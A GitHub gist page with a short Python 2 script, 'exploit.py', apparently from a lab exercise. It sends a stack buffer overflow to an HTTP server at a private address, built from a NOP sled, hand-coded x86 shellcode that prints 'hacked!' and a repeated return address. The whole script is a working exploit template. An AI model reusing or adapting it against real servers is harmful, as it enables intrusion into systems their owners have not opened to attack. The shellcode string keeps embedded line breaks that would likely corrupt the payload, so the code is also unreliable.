Skip to content

Instantly share code, notes, and snippets.

@danpalmer

danpalmer/exploit.py

Created December 14, 2012 17:14
Show Gist options
  • Star 1 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save danpalmer/4287063 to your computer and use it in GitHub Desktop.
Save danpalmer/4287063 to your computer and use it in GitHub Desktop.
Download ZIP
Raw
exploit.py
import httplib
host = "172.16.89.128"
port = 8000
buffer_addr = "\x98\xF1\xFF\xBF" # 0xbffff198
payload = """
\xEB\x19\x31\xC0\x31\xDB\x31\xD2\x31\xC9\xB0\x04\xB3
\x01\x59\xB2\x07\xCD\x80\x31\xC0\xB0\x01\x31\xDB\xCD
\x80\xE8\xE2\xFF\xFF\xFF\x68\x61\x63\x6B\x65\x64\x21
""".strip()
padding = 1
def overflow():
nops = "\x90" * 100
rets = buffer_addr * 200
code = nops + payload + ("A" * padding) + rets
return code
def exploit():
connection = httplib.HTTPConnection(host, port)
connection.request("GET", overflow())
response = connection.getresponse()
if __name__ == "__main__":
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment